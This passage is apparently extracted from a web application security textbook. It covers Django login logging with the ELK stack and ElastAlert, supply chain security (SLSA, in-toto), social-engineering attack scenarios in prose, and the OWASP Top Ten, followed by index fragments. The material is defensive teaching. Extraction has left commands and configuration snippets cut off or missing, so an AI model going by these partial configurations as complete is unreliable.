We have one function for each of four signals sent by the auth module. The @
receiver decorator binds each function to a signal. In each case, we want to
send a message to the login logger. We arbitrarily choose level INFO. We will
log the username, IP address, and URI as well as success or failure.
We need to activate these signal handlers when the application starts. A good
place to do this is in the ready()function in CoffeeshopConfig. Edit the
vagrant/coffeeshopsite/coffeeshop/apps.py
class CoffeeshopConfig(AppConfig):
name = 'coffeeshop'
def ready(self):
# Implicitly connect a signal handlers decorated with
@receiver.
from . import signals
415
Chapter 12 Logging and Monitoring
Now restart Apache by running the following within the Coffeeshop VM:
Configure Logstash
We need to replace
/etc/logstash/conf.d/apache.conf
/vagrant/elk/apachedjango.conf
We are adding the following to the original conf file. First, we define a new file
source in the input { ... } section:
file {
path => "/var/log/django/login.log"
start_position => "beginning"
}
Second, we are adding a new else clause to the filter { ... } section:
416
Chapter 12 Logging and Monitoring
date {
match => [ "timestamp" , "yyyy-MM-dd HH:mm:ss,SSS" ]
}
}
The match line in grok parses the message field into some new fields.
TIMESTAMP_ISO8601, WORD, etc., are built-in Logstash templates. We are
reusing some fields that have already been created when parsing the Apache
access.log file, for example, for the username. The [user][identity]
syntax means the value will be placed in a variable called user.identity.
The match line within date parses the ISO 8601 timestamps that were
extracted by grok. Without this, Logstash would use the time it processed the
log entry rather than the timestamp contained within it.
Restart Logstash with
Configure Kibana
http://10.50.0.2:5601
in a web browser.
As in the last exercise, we are going to create a filter, this time on the new
django_login type we created previously. From the two-horizonal-bar menu
at the top right of Kibana, select Discover under Analytics. Click + Add filter, as
in Figure 12-2. For Field, select type. For Operator, select is. Under Value, enter
django_login and click Save.
Let’s make a few login and logout records. In another tab or browser
window, visit
http://10.50.0.2/account/login/
417
Chapter 12 Logging and Monitoring
and make a failed login attempt (e.g., with xxx as the username and
password). Now log in correctly as either bob or alice and then logout. Go
back to Kibana and click the Refresh button at the top right. You should see a
screen similar to Figure 12-6.
Let’s customize the table so it’s easier to read. From the fields list at the left
of the screen, hover over each of the following to see the plus button and then
click it to add the field to the table:
• source.address
• user.identity
• action
• status
418
Chapter 12 Logging and Monitoring
419
Chapter 12 Logging and Monitoring
420
Chapter 12 Logging and Monitoring
In the exercise, we will use the Any type. For more details on the
others, see the ElastAlert documentation.2
ElastAlert is designed to be run as a daemon, for example, with the
Python zdaemon process controller or as a systemd service.
This exercise builds on the previous two, so make sure you have completed
them first. We will use ElastAlert to send an email whenever someone
successfully logs in as admin. We have MailCatcher set up in the Coffeeshop
VM, so we will use it as our SMTP server.
Configuring ElastAlert
/vagrant/elk/elastalert/config.yaml
https://github.com/Yelp/elastalert.git
Our configuration file does not differ much from the example. The line
rules_folder: /vagrant/elk/elastalert/rules
2
See https://elastalert.readthedocs.io/en/latest/ruletypes.html
421
Chapter 12 Logging and Monitoring
points ElastAlert at a directory containing rules. We have just one rule in our
directory. The lines
es_host: localhost
and
es_port: 9200
We also tell Elasticsearch to run every minute and buffer for 15 minutes in
case some alerts are not received in real time.
sudo elastalert-create-index
For the Elasticsearch host and port, enter localhost and 9200, respectively.
Enter f for Use SSL. You can choose the defaults for all other options.
filter:
- term:
type: "django_login"
- term:
user.identity: admin
- term:
action: login
422
Chapter 12 Logging and Monitoring
include:
- timestamp
- host
- user.identity
- source.address
- status
alert_text: |-
Login as {} on {} from {} {}
alert_text_args:
- user.identity
- host
- source.address
- status
We set the alert type to Email and configure to recipient address with
alert:
- "email"
email:
- "[email protected]"
423
Chapter 12 Logging and Monitoring
The file also contains connection details for the SMTP server.
Running ElastAlert
Now logout from Coffeeshop if you are logged in already and then visit
http://10.50.0.2/admin
We have set the --verbose flag on ElastAlert, so you should see it detect
the login. It may take a minute or two as it only runs every 60 seconds. Open
MailCatcher by visiting
http://10.50.0.2:1080
12.5 Summary
Logging and monitoring are essential for spotting and responding to
intrusions or intrusion attempts. Web servers, database servers, operating
systems, and web applications all produce logs, but monitoring them
regularly is difficult without an aggregation and search toolset such as the
ELK stack.
Logging applications such as Kibana don’t always get looked at
regularly enough to act on critical security events promptly. Alert tools
such as ElastAlert can filter events and send them to other channels that
are monitored more frequently, such as Email or Stack.
424
Chapter 12 Logging and Monitoring
425
CHAPTER 13
Third-Party
and Supply Chain
Security
In this chapter, we turn to security topics beyond writing code but that
nonetheless affect our application security: developers and their devices,
third-party components, and supply chain security.
People are often the weakest link in application security. Attackers
know this and therefore target organizations’ staff in preference to finding
code vulnerabilities. Fortunately, there are defenses against such attacks,
and we will look at those in this chapter.
All code depends in some form on third-party components and
applications. We have already looked at services such as web servers and
databases. In this chapter, we will look at the components that get included
in your code base, such as frameworks, packages, and libraries.
Writing code is only one step in the process from text editor to running
application. In between, we often have source code control, continuous
integration and continuous delivery (CI/CD), and container repositories
such as Docker Registry. These form a kind of supply chain from code to
application and can introduce vulnerabilities along the way. We conclude
this chapter by looking at a framework to make the entire supply chain
more secure.
They often store SSH keys, as well as sensitive source code, on laptops
which they take out of the office, on public transport, on holidays, to cafes,
and other public locations. They also have session IDs on these laptops with
access to your web application, source code control, and other services.
• Job advertisements
• Public tenders
• Social media
428
Chapter 13 Third-Party and Supply Chain Security
Example 1
A company has its organizational chart on its website. An attacker learns
that an application operator is on holiday and uses the chart to phone
someone else in the same or a related department, pretending to be a
customer. For example, he may wish to change his registered address.
By pressuring a staff member who has access but is not familiar with
the correct process for changing customer data, the attacker bypasses
corporate procedures and convinces the other staff member to make
the change.
Example 2
A company places a job advertisement for a developer. In order to attract
the best applicants, the advertisement lists the technologies the company
uses. It gives the name, email address, and phone number of the hiring
manager for applicants to apply to or ask questions.
The attacker searches the Internet for the hiring manager. Using
resources such as social media, online address books, local newspapers,
and social clubs, the attacker finds her address and photograph. As the
attacker also knows the company address, he waits at the local train station
on weekday mornings until he finds the hiring manager. Distracting her, he
steals her laptop and copies her SSH keys.
Example 3
An attacker visits the company offices where, from the company’s website,
she knows developers work. She leaves a few Rubber Duckies lying near
the entrance. A Rubber Ducky is a USB dongle that looks like a USB storage
429
Chapter 13 Third-Party and Supply Chain Security
device but in fact implements the USB keyboard protocol.1 When plugged
into a computer, it sends preprogrammed keystrokes. The attacker has
programmed it to send SSH keys over HTTP to her server.
1
See https://shop.hak5.org/products/usb-rubber-ducky-deluxe
430
Chapter 13 Third-Party and Supply Chain Security
13.2 Third-Party Code
Our applications always depend on third-party code, tools, and
frameworks. These include
• The operating system and its packages
• JavaScript packages
Back-End Dependencies
Back-end dependencies can introduce intentional and unintentional
vulnerabilities. A malicious developer can release a tool that looks useful
enough for other developers to include in their applications but that
also contains malware. This may be a backdoor for gaining shell access
or spyware for receiving data from your application. Alternatively, they
can add malicious code to existing packages, for example, through
merge requests on GitHub. In a recent incident, uncovered by a security
researcher at Sonatype,2 malicious code was added to a number of Python
packages to exfiltrate secrets such as AWS credentials.
For our examples, we have used Django. This has its own
dependencies, plus we have downloaded other packages such as django-
cors-headers and django-csp. Any of these packages could contain
vulnerabilities.
2
See www.msn.com/en-us/news/technology/malicious-python-packages-dump-
your-aws-secrets-online/ar-AAYVmnz
431
Chapter 13 Third-Party and Supply Chain Security
432
Chapter 13 Third-Party and Supply Chain Security
To defend against backdoors, block all ports except for those you
need. Use a host firewall or TCP Wrappers to block or limit access to all
other ports (see Section 5.7). This also defends against unintentional
vulnerabilities. If a package offers a service over a port that you don’t need,
it is safest to block the port in case it is vulnerable.
Front-End Dependencies
Modern JavaScript packages can have hundreds of JavaScript
dependencies. For example, creating a skeleton Angular application, even
without any of your own code and dependencies, downloads over 900
JavaScript packages.
The npm package manager can scan for known vulnerabilities in
downloaded packages. The command is
npm audit
This does not work in all cases. Packages can have complex
dependencies, and if the developer of one needs a particular version of a
package, and that version has a vulnerability, then it cannot be removed
without removing your dependency of the original package.
JavaScript packages can also contain unknown vulnerabilities.
Developers of sites for which security is critical often avoid big frameworks
with many dependencies for critical code. For example, avoiding React,
Angular, and so on for login pages and pages requesting credit card details.
Instead, they handcraft all the JavaScript used for these pages and use CSP
to ensure no other dependencies are unintentionally loaded.
433
Chapter 13 Third-Party and Supply Chain Security
Using big frameworks like React for part of an application and not for
others introduces discontinuities in the application’s look and feel. If this is
an issue, the critical code can be encapsulated in an iframe with corporate
branding in the rest of the page. Encapsulating critical code in an iframe
prevents data leading to the surrounding page.
3
See https://security.googleblog.com/2021/06/introducing-slsa-end-to-
end-framework.html
434
Chapter 13 Third-Party and Supply Chain Security
435
Chapter 13 Third-Party and Supply Chain Security
4
See https://in-toto.io/in-toto/
436
Chapter 13 Third-Party and Supply Chain Security
determined by a file (in JSON format in the case of in-toto) that describes
the steps that were taken to derive an object, such as a Git clone or Jenkins
build. An attestation is achieved by signing this file to demonstrate that the
owner of the key attests that the process described in the file was followed.
SLSA defines four levels of increasing security. Developers can choose
the lowest level, or progressively higher levels for greater protection
against attack.
The first level, SLSA 1, only requires build processes to be automated
and a provenance file to be generated.
SLSA 2 adds further requirements to SLSA 1. It requires version
control and a hosted build service that can generate a signed attestation of
provenance.
SLSA 3, in addition to the requirements for SLSA 2, requires that the
source code and signed provenance documents be auditable.
The highest level, SLSA 4, requires two-person review of all changes
and a reproducible build process.
We will not go into more detail about SLSA as it is still in alpha and
evolving. Refer to the website cited previously for the latest state of the
framework and to the Git repository.5
5
See https://github.com/slsa-framework/slsa
6
https://in-toto.io
437
Chapter 13 Third-Party and Supply Chain Security
If a user Bob runs this command, and his private key is used in step 4,
Bob is attesting that he has followed the procedure in the layout file to
clone the repository.
Build, packaging, testing, and verification steps can also be executed,
by Bob, other developers, or the product owner, using the same layout file
and their own private keys.
7
https://github.com/in-toto/demo
438
Chapter 13 Third-Party and Supply Chain Security
13.4 Summary
In this chapter, we looked at vulnerabilities that don’t originate from your
source code. Staff members themselves can be vulnerable to attack if their
devices store sensitive information and are not properly secured with
passwords and/or encryption. Companies can inadvertently help attackers
learn about their applications and company organization by publishing
details in annual reports, job advertisements, etc.
Vulnerabilities can also exist in frameworks and libraries our code
depends on. We can defend against these by keeping these packages up
to date, sticking to well-known and mature packages, using official base
images, and blocking ports that are not needed by our application. We can
also run automatic vulnerability scanners.
Supply chain security is an emerging discipline for securing the
development process from source code control to deployment. Public-
private key pairs can be used to enable authorized personnel to attest that
each stage in the process has been performed according to design and by
the expected person.
In the next, final chapter, we look at other resources that you can use to
help keep your application secure.
439
CHAPTER 14
Further Resources
We’d love it if this book were the only thing you needed to read about web
application security. Unfortunately, it is not, and the reason is that things
change. New technologies come out, introducing new vulnerabilities. New
versions of software are released, with new bugs creating threats. And
hackers are always on the lookout for vulnerabilities that haven’t been
discovered yet.
Knowing how to write a secure web application is the first step. The
next step is staying up to date with vulnerabilities and trends and keeping
your new and existing applications secure. In this chapter, we will look at
some useful resources for staying up to date. We will also summarize what
we have learned.
14.1 Vulnerability Databases
Fortunately for us, there are many people looking for vulnerabilities in
software: good guys as well as bad. When vulnerabilities are found in
software packages, they are often unloaded to vulnerability databases.
The CVE project, which stands for Common Vulnerabilities and
Exposures, is an effort to classify known vulnerabilities in a consistent way
and catalogue them in an online, searchable database. It was launched by
the MITRE Corporation in 1999 and is available at https://cve.mitre.
org. In 2005, the US National Institute of Standards and Technology
0.0 No vulnerability
0.1–3.9 Low
4.0–6.9 Medium
7.0–8.9 High
9.0–10.0 Critical
https://nvd.nist.gov/vuln/detail/CVE-2007-6750
explains that it affects versions 1.0 through to 2.1.6 of the web server.
1
See https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
442
Chapter 14 Further Resources
443
Chapter 14 Further Resources
https://owasp.org/www-project-top-ten/
• A02:2021–Cryptographic Failures
• A03:2021–Injection
• A04:2021–Insecure Design
• A05:2021–Security Misconfiguration
444
Chapter 14 Further Resources
• Misconfigured CORS
Cryptographic Failures
Cryptographic Failures has moved from the third place to the second. It
was previously called Sensitive Data Exposure. This category includes
445
Chapter 14 Further Resources
Injection
Injection was previously in the top position. It slid down to the third place
largely because frameworks have closed a number of these vulnerabilities
in their default configuration.
This category includes cross-site scripting, SQL injection, command
injection, code injection, and any other injection vulnerabilities where
user-supplied code is executed in some way on the server without
sanitizing and validation. We discussed this category in Chapter 7.
Insecure Design
This category is new for 2021. It refers to flaws in design, as opposed to flaws
in implementation. Threat modelling, which we covered in Chapter 3, helps
greatly in identifying trust boundaries and attack surfaces. Using established
patterns and, where possible, well-scrutinized frameworks and libraries
helps prevent insecure design patterns creeping into code.
Poorly designed APIs are also common. Keeping to correct REST
principles, as discussed in Chapter 6, helps make these secure.
Security Misconfiguration
Up one place from 2017, this broad topic includes
446
Chapter 14 Further Resources
447
Chapter 14 Further Resources
SRI and nonces, as described in Chapter 8, help with the former; the
supply chain security techniques discussed in Chapter 13 are designed to
address the latter.
448
Chapter 14 Further Resources
14.4 Summary
Web application security, like IT in general, is constantly evolving. In
this book, we have covered the major aspects of making your application
secure. However, it is important to understand why each of the techniques
protects your application and what their limitations are. Writing a secure
application is not about cutting and pasting boilerplate code. Rather, it
is understanding your threats, your users’ requirements, and the toolkit
available to eliminate or mitigate those risks while still meeting your other
requirements.
In this last section, we give our own top ten guide of things you should
do when creating a web application:
449
Chapter 14 Further Resources
450
Chapter 14 Further Resources
Above all, learn from your mistakes. Even the best development
teams let vulnerabilities in occasionally. The important thing is that you
can identify and fix them quickly and, next time, can make an even more
secure application. Good luck on your journey!
451
Bibliography
[1] D. Ahrens and S. Bremer. HTTP Digest Access
Authentication. RFC 7616, RFC Editor, 9 2015.
454
BIBLIOGRAPHY
455
BIBLIOGRAPHY
456
Index
A Authorization, 288
API keys (see API keys)
Access token
JWTs (see JSON Web Tokens)
OAuth2, 355
role-based, 329–332
Address Resolution Protocol, 103
Authorization code
Apache, 26
OAuth2, 355
banners, 137
Authorization code flow,
API keys, 340–347
353–372
in Django, 342
Django, 362
Apple Face ID, 316
ARP, see Address Resolution OpenID Connect, 380
Protocol Authorization code with PKCE
ARP poisoning, 102 flow, 353, 372–374
Asset, 43 Authorization header, 290
Atom, 17 Authorization server, 353
Attack surface, 56
Attack vector, 54
B
Authentication, 287
Apache configuration, 290 Back door, 207
biometric, 315–328 Banners, 137
form-based, 294 Base64, 75
HTTP Basic, 289 Base64Url encoding, 336
HTTP Digest, 291 Beats, 401
multi-factor, 288, 319 Billion Laughs
public-key cryptography, 311 attack, 180–184
two-factor, 288, 303–311 BinarySerializer, 184
username and password, 288 Brute force attack, 271
458
INDEX
django-two-factor-auth G
package, 303
Git, 30
Double-submit cookie
Google Authenticator, 301–311
pattern, 242
URIs, 302
DSL, 406
grok, 417
E H
Elastalert, 421–424 Hash-Based Message
Elasticsearch, 401 Authentication Code, see
Elastic Stack, 401 also HMAC
Elevation of privilege, 50 Hashing, 74
ELK, see also Elastic Stack has_perm function, 331
Encryption, 70–81 HMAC, 276
public-key, 71 Host firewalls, 138–140
symmetric, 70 HSTS header, 123
Ethernet hub, 104 htpasswd command, 291
Ethernet switch, 104 .htpassword file, 291
Ethernet tap, 106 HTTP, 60–68
Ettercap, 104 request methods, 65
response codes, 66
HTTP headers
F setting in Apache, 234
Face ID, see Apple Face ID setting in Django, 234
FaceNiff, 108 HTTPS, 89–92, 114
Facial recognition, 316 HTTP Toolkit, 16, 214
Fingerprint recognition, 315
Firefox, 16
Firesheep, 107 I
Flask, 101 Idempotent, 165
404 and 500 pages, 144–146 IFRAME, 254
459
INDEX
460
INDEX
461
INDEX
462